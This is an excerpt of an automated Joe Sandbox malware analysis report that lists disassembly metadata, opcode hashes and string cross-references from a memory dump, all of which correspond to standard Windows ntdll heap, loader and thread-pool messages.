                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  • Opcode ID: 5e2b91e258f60e41254a8544d988cc282cce9b0bfab26b2f362da1a8c35bb177
                                                  • Instruction ID: 602225cece3421188bb9b386a1ee1c234b33ccc9606b7b6b16e1910604fab4af
                                                  • Opcode Fuzzy Hash: 5e2b91e258f60e41254a8544d988cc282cce9b0bfab26b2f362da1a8c35bb177
                                                  • Instruction Fuzzy Hash: C6818AB1A01358AFEB20EF95C841FAEFBB9AB48714F605169E605B7680D3B5B940CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                  • API String ID: 2994545307-3063724069
                                                  • Opcode ID: f5ee7a8151034d52458f7603a67bf3cf150e8fc6833548e7ad571e18727f44c7
                                                  • Instruction ID: 793a984f9ee9d1a271a2cc6993b28d0dd032453695f0213c4299287c9c84cc4e
                                                  • Opcode Fuzzy Hash: f5ee7a8151034d52458f7603a67bf3cf150e8fc6833548e7ad571e18727f44c7
                                                  • Instruction Fuzzy Hash: ABD1F4F2844311AFE721DA54C841B6BB7E8EFD4728F045E29FA84A7160E774FD148B92
                                                  Strings
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0430D262
                                                  • @, xrefs: 0430D0FD
                                                  • @, xrefs: 0430D313
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 0430D196
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0430D0CF
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0430D2C3
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0430D146
                                                  • @, xrefs: 0430D2AF
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                  • API String ID: 0-1356375266
                                                  • Opcode ID: 8f60a66803c9cbbdbd5148b35c75a4e9401665027a0a0e80290b2476139f4372
                                                  • Instruction ID: b9035e42578ac37bf14e94f51784f44dd92081c39987eb48dbd890b54c2216b7
                                                  • Opcode Fuzzy Hash: 8f60a66803c9cbbdbd5148b35c75a4e9401665027a0a0e80290b2476139f4372
                                                  • Instruction Fuzzy Hash: 65A180715083059FE721DF65C450B5BBBE8BF84719F009A2EF99996280E774F908CF52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: 4ba4e0dffbe9df433cb57193e0c9b288795eb7a7ed7123bb18b70113b9791449
                                                  • Instruction ID: 5b567844853e0864253791f40d651546c351f29a8f8acd538addcc685452cda9
                                                  • Opcode Fuzzy Hash: 4ba4e0dffbe9df433cb57193e0c9b288795eb7a7ed7123bb18b70113b9791449
                                                  • Instruction Fuzzy Hash: 984202352087429FD324DF28C494A2AB7E5FF84708F14AA6DE496CB781E774F845CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: 564b69e5f616182c1eaa17e6872fedf938ccbaaa1bd9c057efc951ebd219d423
                                                  • Instruction ID: c17c1e633d40f01a02793c58990ad87d84680aad584d528034ba3a51c273ce94
                                                  • Opcode Fuzzy Hash: 564b69e5f616182c1eaa17e6872fedf938ccbaaa1bd9c057efc951ebd219d423
                                                  • Instruction Fuzzy Hash: BAC15931B007259BEB289F64C985B7FF7A5AF45304F24A169E942EB680E7B4FD44C390
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 0-1745908468
                                                  • Opcode ID: 45f55abef484c2f11131da91424fa536262abf4536c7d3799b3ce8475e9e14e1
                                                  • Instruction ID: f70fad61f4f5e4108127707e4037a9361c906e46cadfbb1533b19a87682cb182
                                                  • Opcode Fuzzy Hash: 45f55abef484c2f11131da91424fa536262abf4536c7d3799b3ce8475e9e14e1
                                                  • Instruction Fuzzy Hash: CE910231A00644DFEB11DFA8C841BEDBBF1EF49708F14A059D985DBA92CB35B980CB90
                                                  Strings
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 04369A2A
                                                  • apphelp.dll, xrefs: 04306496
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 043699ED
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 04369A01
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 04369A11, 04369A3A
                                                  • LdrpInitShimEngine, xrefs: 043699F4, 04369A07, 04369A30
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-204845295
                                                  • Opcode ID: 412ddd2ed29e07d4ce2443dfc913a65802b746bb7f39b451993198c77bbe0759
                                                  • Instruction ID: de7a5498a25aa656aea535358f6f1004caa5b0dcec429783e10cacf317501ceb
                                                  • Opcode Fuzzy Hash: 412ddd2ed29e07d4ce2443dfc913a65802b746bb7f39b451993198c77bbe0759
                                                  • Instruction Fuzzy Hash: B651AF71218301DFE320DF24C952B6BB7E8EF84B54F40991DE9869B194E630F954CBA2
                                                  Strings
                                                  • SXS: %s() passed the empty activation context, xrefs: 04382165
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 043821BF
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 04382178
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0438219F
                                                  • RtlGetAssemblyStorageRoot, xrefs: 04382160, 0438219A, 043821BA
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 04382180
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  • Opcode ID: 46aed41a103bf89e9abeb8dca9cdd41011c29093c6cfbecc33115561e3f6954d
                                                  • Instruction ID: fb0216129cfbcccebba9111263ae73a06986ed1303471f0add513efac1ee0232
                                                  • Opcode Fuzzy Hash: 46aed41a103bf89e9abeb8dca9cdd41011c29093c6cfbecc33115561e3f6954d
                                                  • Instruction Fuzzy Hash: AA310536B403147BFB219A958C41FABBBB8DFD4B84F5510E9FA04B7141E270BE00DAA0
                                                  Strings
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 043881E5
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 04388181, 043881F5
                                                  • LdrpInitializeProcess, xrefs: 0434C6C4
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0434C6C3
                                                  • Loading import redirection DLL: '%wZ', xrefs: 04388170
                                                  • LdrpInitializeImportRedirection, xrefs: 04388177, 043881EB
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  • Opcode ID: d1773eb7265a330e029c237b351df0fe0f0f4e78a5864f78c27b0581e66a8052
                                                  • Instruction ID: 5cd6d491a101df2e67a3b89dd964638f88080b50bb82e6f454cd427a4150fcb3
                                                  • Opcode Fuzzy Hash: d1773eb7265a330e029c237b351df0fe0f0f4e78a5864f78c27b0581e66a8052
                                                  • Instruction Fuzzy Hash: 0E31F1717543019BE214EF28DD46E2AB7D4EFC4B24F04556CF941AB290EA24FC04CBA2
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 043802BD
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 043802E7
                                                  • RTL: Re-Waiting, xrefs: 0438031E
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 86ac3ea0eccf7aa5324171af824496f8d004339d6c389969b8a50def86c8ae68
                                                  • Instruction ID: 45a890cdba69d0b0e0774a86e667a7c3ed80fb37425a5124e7808e0d99adc6f6
                                                  • Opcode Fuzzy Hash: 86ac3ea0eccf7aa5324171af824496f8d004339d6c389969b8a50def86c8ae68
                                                  • Instruction Fuzzy Hash: 5AE1A030A047419FE729DF28C884B2AB7E4BF88324F545A6DF5A58B6E0D774F944CB42
                                                  Strings
                                                  • Kernel-MUI-Language-Allowed, xrefs: 0433527B
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 04335352
                                                  • WindowsExcludedProcs, xrefs: 0433522A
                                                  • Kernel-MUI-Language-SKU, xrefs: 0433542B
                                                  • Kernel-MUI-Number-Allowed, xrefs: 04335247
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: c4189853f3f2dfb39d9de71bcdb04c10219dacd5f0899ff01645660eb272d849
                                                  • Instruction ID: 08d4d7a6d2e3316e3588432c1874f0ffaa0572c8541b8303ba37b93a6fe61f29
                                                  • Opcode Fuzzy Hash: c4189853f3f2dfb39d9de71bcdb04c10219dacd5f0899ff01645660eb272d849
                                                  • Instruction Fuzzy Hash: D7F14C72D10229EFDB15DFA8C980EEEBBBDEF08654F55505AE901E7210E774BE018B90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1975516107
                                                  • Opcode ID: a949d1ed77d91ea61d0ff44d14d51df12f27241e8c2d6fa0d4dc1b2196140511
                                                  • Instruction ID: 51ea8a50e18bd4f984204653226299dbf9443f75586338c72ea5b620ae6b5700
                                                  • Opcode Fuzzy Hash: a949d1ed77d91ea61d0ff44d14d51df12f27241e8c2d6fa0d4dc1b2196140511
                                                  • Instruction Fuzzy Hash: 1851EE71A00745DFEB24DFA4D6847ADBBB1FF48318F24A159D801AB291D778B891CF80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: 204d24ebd71bdeb087ad32d7721fcdf3207fbfd0002365d9d0c6a4b835154129
                                                  • Instruction ID: af4f93b456089c3dabed6365f8d3cfa020541d7214c704bfc1abe77a9af3d5c9
                                                  • Opcode Fuzzy Hash: 204d24ebd71bdeb087ad32d7721fcdf3207fbfd0002365d9d0c6a4b835154129
                                                  • Instruction Fuzzy Hash: A701D832264651EFE229A759A429F63FBD4DF82B34F14D159E0018B9D2CBA8BC84C960
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: cdcf63b84c48d972bbbee6d1a44ecfa17fd1e08ee5e895919eb75d777196c328
                                                  • Instruction ID: 35d3e287a1ee816ce90ea6a766fea1163f928db348627389c49cfbbdd5e05105
                                                  • Opcode Fuzzy Hash: cdcf63b84c48d972bbbee6d1a44ecfa17fd1e08ee5e895919eb75d777196c328
                                                  • Instruction Fuzzy Hash: 1413BE70A00665DFDB28DF68C6907A9BBF1FF48304F2492A9D859AB381D734B945CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 2994545307-3570731704
                                                  • Opcode ID: 928c6d9c744362c94ef77540290deb6aa2543d768b187e90d348b257383314b5
                                                  • Instruction ID: 2829c82d73ea661664b208406442e92f1e45d43c2e751f274042c0bb17f33417
                                                  • Opcode Fuzzy Hash: 928c6d9c744362c94ef77540290deb6aa2543d768b187e90d348b257383314b5
                                                  • Instruction Fuzzy Hash: 14926C71A00668DFEF24CF18CE80BA9B7B5BF45314F1591EAD849A7291E734AE80CF51
                                                  Strings
                                                  • @, xrefs: 04348591
                                                  • LdrpInitializeProcess, xrefs: 04348422
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0434855E
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 04348421
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 2994545307-1918872054
                                                  • Opcode ID: a8797981db9f8e9e50676266d506c85ee6407495028f3a10cbb368b95b2c5f91
                                                  • Instruction ID: ad1ca42a48132c55051a5792884eaff7559bd34efc21e524553396cee983db4c
                                                  • Opcode Fuzzy Hash: a8797981db9f8e9e50676266d506c85ee6407495028f3a10cbb368b95b2c5f91
                                                  • Instruction Fuzzy Hash: E7916B71618344AFEB25EE61CC40EABB7E8EF84748F40596EFA8492150E734F944CF62
                                                  Strings
                                                  • SXS: %s() passed the empty activation context, xrefs: 043821DE
                                                  • .Local, xrefs: 043428D8
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 043821D9, 043822B1
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 043822B6
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  • Opcode ID: 70be1f3308740e968da6774af241482b21b6d4ee1793398c1821e75e6a95ef82
                                                  • Instruction ID: fa85d393e05f3a31fb7d83274ddbde0fbd6663136baf5321098cdb6b777ea105
                                                  • Opcode Fuzzy Hash: 70be1f3308740e968da6774af241482b21b6d4ee1793398c1821e75e6a95ef82
                                                  • Instruction Fuzzy Hash: 63A18F35A002299BDB24DFA4DC84BEAB3B5BF98354F1555E9E808A7251D730BE90CF90
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 04370FE5
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 04371028
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0437106B
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 043710AE
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  • Opcode ID: 5d894e8819ff195b667b2ac57c59494c0ea3295eb70b419e0005200b780bda6f
                                                  • Instruction ID: 77b19102095cd99fcf4853b082c617ca778f08216f710032ec1090ed6b9ec8b3
                                                  • Opcode Fuzzy Hash: 5d894e8819ff195b667b2ac57c59494c0ea3295eb70b419e0005200b780bda6f
                                                  • Instruction Fuzzy Hash: DB71C0B1904304AFDB20DF54C885F9B7BA8AF54768F006469FC4A8B296D734E588CFD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 2994545307-2586055223
                                                  • Opcode ID: c3c3a8c86186d3b718719bec8ba72cdca768c55815509b80579fd7cedbc588af
                                                  • Instruction ID: 10417b6cb77fb8966f4ce09e0489a150bb34a8e16665903d469372a6b2cc54cf
                                                  • Opcode Fuzzy Hash: c3c3a8c86186d3b718719bec8ba72cdca768c55815509b80579fd7cedbc588af
                                                  • Instruction Fuzzy Hash: D8616432204741AFE322DF68C855F27B7E8EF84B18F14A528E9528B2D1D774F804CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
